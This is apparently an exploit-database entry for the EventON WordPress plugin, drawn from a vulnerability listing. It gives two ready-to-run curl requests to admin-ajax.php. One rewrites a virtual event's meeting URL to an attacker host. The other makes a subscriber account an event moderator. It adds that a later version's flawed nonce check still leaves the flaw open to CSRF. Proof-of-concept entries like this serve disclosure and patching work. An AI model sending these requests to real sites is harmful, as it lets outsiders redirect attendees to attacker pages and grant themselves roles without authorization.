## https://sploitus.com/exploit?id=WPEX-ID:73D1B00E-1F17-4D9A-BFC8-6BC43A46B90B
To set the Meeting URL to https://attacker.com/ on the Virtual Event with ID 240:
curl -X POST --data "event_id=240&_vir_url=https://attacker.com/" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_save_virtual_event_settings'
To set the subscriber with user ID 5 as moderator of the Virtual Event with ID 240:
curl -X POST --data "eid=240&_user_role=subscriber&_mod=5" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_save_virtual_mod_settings'
v4.5.8 of the premium plugin added capability and CRSF checks, however the nonce verification is flawed, still allowing the issue to be exploited via CSRF